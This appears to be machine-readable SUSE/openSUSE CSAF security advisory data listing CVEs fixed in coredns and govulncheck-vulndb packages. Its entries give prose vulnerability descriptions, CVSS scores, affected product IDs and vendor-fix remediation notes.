"text": "golang-jwt is a Go implementation of JSON Web Tokens. Unclear documentation of the error behavior in `ParseWithClaims` can lead to situation where users are potentially not checking errors in the way they should be. Especially, if a token is both expired and invalid, the errors returned by `ParseWithClaims` return both error codes. If users only check for the `jwt.ErrTokenExpired ` using `error.Is`, they will ignore the embedded `jwt.ErrTokenSignatureInvalid` and thus potentially accept invalid tokens. A fix has been back-ported with the error handling logic from the `v5` branch to the `v4` branch. In this logic, the `ParseWithClaims` function will immediately return in \"dangerous\" situations (e.g., an invalid signature), limiting the combined errors only to situations where the signature is valid, but further validation failed (e.g., if the signature is valid, but is expired AND has the wrong audience). This fix is part of the 4.5.1 release. We are aware that this changes the behaviour of an established function and is not 100 % backwards compatible, so updating to 4.5.1 might break your code. In case you cannot update to 4.5.0, please make sure that you are properly checking for all errors (\"dangerous\" ones first), so that you are not running in the case detailed above.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-51744",
"url": "https://www.suse.com/security/cve/CVE-2024-51744"
},
{
"category": "external",
"summary": "SUSE Bug 1232936 for CVE-2024-51744",
"url": "https://bugzilla.suse.com/1232936"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.1,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-01-24T09:09:32Z",
"details": "moderate"
}
],
"title": "CVE-2024-51744"
},
{
"cve": "CVE-2025-58063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58063"
}
],
"notes": [
{
"category": "general",
"text": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58063",
"url": "https://www.suse.com/security/cve/CVE-2025-58063"
},
{
"category": "external",
"summary": "SUSE Bug 1249389 for CVE-2025-58063",
"url": "https://bugzilla.suse.com/1249389"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-01-24T09:09:32Z",
"details": "moderate"
}
],
"title": "CVE-2025-58063"
},
{
"cve": "CVE-2025-68156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68156"
}
],
"notes": [
{
"category": "general",
"text": "Expr is an expression language and expression evaluation for Go. Prior to version 1.17.7, several builtin functions in Expr, including `flatten`, `min`, `max`, `mean`, and `median`, perform recursive traversal over user-provided data structures without enforcing a maximum recursion depth. If the evaluation environment contains deeply nested or cyclic data structures, these functions may recurse indefinitely until exceed the Go runtime stack limit. This results in a stack overflow panic, causing the host application to crash. While exploitability depends on whether an attacker can influence or inject cyclic or pathologically deep data into the\nevaluation environment, this behavior represents a denial-of-service (DoS) risk and affects overall library robustness. Instead of returning a recoverable evaluation error, the process may terminate unexpectedly. In affected versions, evaluation of expressions that invoke certain builtin functions on untrusted or insufficiently validated data structures can lead to a process-level crash due to stack exhaustion. This issue is most relevant in scenarios where Expr is used to evaluate expressions against externally supplied or dynamically constructed environments; cyclic references (directly or indirectly) can be introduced into arrays, maps, or structs; and there are no application-level safeguards preventing deeply nested input data. In typical use cases with controlled, acyclic data, the issue may not manifest. However, when present, the resulting panic can be used to reliably crash the application, constituting a denial of service. The issue has been fixed in the v1.17.7 versions of Expr. The patch introduces a maximum recursion depth limit for affected builtin functions. When this limit is exceeded, evaluation aborts gracefully and returns a descriptive error instead of panicking. Additionally, the maximum depth can be customized by users via `builtin.MaxDepth`, allowing applications with legitimate deep structures to raise the limit in a controlled manner. Users are strongly encouraged to upgrade to the patched release, which includes both the recursion guard and comprehensive test coverage to prevent regressions. For users who cannot immediately upgrade, some mitigations are recommended. Ensure that evaluation environments cannot contain cyclic references, validate or sanitize externally supplied data structures before passing them to Expr, and/or wrap expression evaluation with panic recovery to prevent a full process crash (as a last-resort defensive measure). These workarounds reduce risk but do not fully eliminate the issue without the patch.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68156",
"url": "https://www.suse.com/security/cve/CVE-2025-68156"
},
{
"category": "external",
"summary": "SUSE Bug 1255330 for CVE-2025-68156",
"url": "https://bugzilla.suse.com/1255330"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-01-24T09:09:32Z",
"details": "important"
}
],
"title": "CVE-2025-68156"
},
{
"cve": "CVE-2025-68161",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68161"
}
],
"notes": [
{
"category": "general",
"text": "The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName configuration attribute or the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property is set to true.\n\nThis issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions:\n\n * The attacker is able to intercept or redirect network traffic between the client and the log receiver.\n * The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender\u0027s configured trust store (or by the default Java trust store if no custom trust store is configured).\n\n\nUsers are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue.\n\nAs an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68161",
"url": "https://www.suse.com/security/cve/CVE-2025-68161"
},
{
"category": "external",
"summary": "SUSE Bug 1255427 for CVE-2025-68161",
"url": "https://bugzilla.suse.com/1255427"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le",
"openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64",
"openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-01-24T09:09:32Z",
"details": "moderate"
}
],
"title": "CVE-2025-68161"
}
]
}
OPENSUSE-SU-2025:15564-1
Vulnerability from csaf_opensuse - Published: 2025-09-18 00:00 - Updated: 2025-09-18 00:00Summary
govulncheck-vulndb-0.0.20250917T170349-1.1 on GA media
Notes
Title of the patch
govulncheck-vulndb-0.0.20250917T170349-1.1 on GA media
Description of the patch
These are all security issues fixed in the govulncheck-vulndb-0.0.20250917T170349-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15564
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20250917T170349-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20250917T170349-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15564",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15564-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-4953 page",
"url": "https://www.suse.com/security/cve/CVE-2025-4953/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54376 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54376/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58058 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58058/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58063 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58063/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58158 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58158/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58430 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58430/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58437/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58445 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58445/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58450 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58450/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59358 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59358/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59359 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59359/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59361 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59361/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-7445 page",
"url": "https://www.suse.com/security/cve/CVE-2025-7445/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-8396 page",
"url": "https://www.suse.com/security/cve/CVE-2025-8396/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9072 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9072/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9084/"
}
],
"title": "govulncheck-vulndb-0.0.20250917T170349-1.1 on GA media",
"tracking": {
"current_release_date": "2025-09-18T00:00:00Z",
"generator": {
"date": "2025-09-18T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15564-1",
"initial_release_date": "2025-09-18T00:00:00Z",
"revision_history": [
{
"date": "2025-09-18T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-4953",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-4953"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in Podman. In a Containerfile or Podman, data written to RUN --mount=type=bind mounts during the podman build is not discarded. This issue can lead to files created within the container appearing in the temporary build context directory on the host, leaving the created files accessible.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-4953",
"url": "https://www.suse.com/security/cve/CVE-2025-4953"
},
{
"category": "external",
"summary": "SUSE Bug 1249835 for CVE-2025-4953",
"url": "https://bugzilla.suse.com/1249835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-4953"
},
{
"cve": "CVE-2025-54123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54123"
}
],
"notes": [
{
"category": "general",
"text": "Hoverfly is an open source API simulation tool. In versions 1.11.3 and prior, the middleware functionality in Hoverfly is vulnerable to command injection vulnerability at `/api/v2/hoverfly/middleware` endpoint due to insufficient validation and sanitization in user input. The vulnerability exists in the middleware management API endpoint `/api/v2/hoverfly/middleware`. This issue is born due to combination of three code level flaws: Insufficient Input Validation in middleware.go line 94-96; Unsafe Command Execution in local_middleware.go line 14-19; and Immediate Execution During Testing in hoverfly_service.go line 173. This allows an attacker to gain remote code execution (RCE) on any system running the vulnerable Hoverfly service. Since the input is directly passed to system commands without proper checks, an attacker can upload a malicious payload or directly execute arbitrary commands (including reverse shells) on the host server with the privileges of the Hoverfly process. Commit 17e60a9bc78826deb4b782dca1c1abd3dbe60d40 in version 1.12.0 disables the set middleware API by default, and subsequent changes to documentation make users aware of the security changes of exposing the set middleware API.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54123",
"url": "https://www.suse.com/security/cve/CVE-2025-54123"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-54123"
},
{
"cve": "CVE-2025-54376",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54376"
}
],
"notes": [
{
"category": "general",
"text": "Hoverfly is an open source API simulation tool. In versions 1.11.3 and prior, Hoverfly\u0027s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can stream real-time application logs (information disclosure) and/or gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs. Version 1.12.0 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54376",
"url": "https://www.suse.com/security/cve/CVE-2025-54376"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-54376"
},
{
"cve": "CVE-2025-58058",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58058"
}
],
"notes": [
{
"category": "general",
"text": "xz is a pure golang package for reading and writing xz-compressed files. Prior to version 0.5.14, it is possible to put data in front of an LZMA-encoded byte stream without detecting the situation while reading the header. This can lead to increased memory consumption because the current implementation allocates the full decoding buffer directly after reading the header. The LZMA header doesn\u0027t include a magic number or has a checksum to detect such an issue according to the specification. Note that the code recognizes the issue later while reading the stream, but at this time the memory allocation has already been done. This issue has been patched in version 0.5.14.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58058",
"url": "https://www.suse.com/security/cve/CVE-2025-58058"
},
{
"category": "external",
"summary": "SUSE Bug 1248889 for CVE-2025-58058",
"url": "https://bugzilla.suse.com/1248889"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-58058"
},
{
"cve": "CVE-2025-58063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58063"
}
],
"notes": [
{
"category": "general",
"text": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
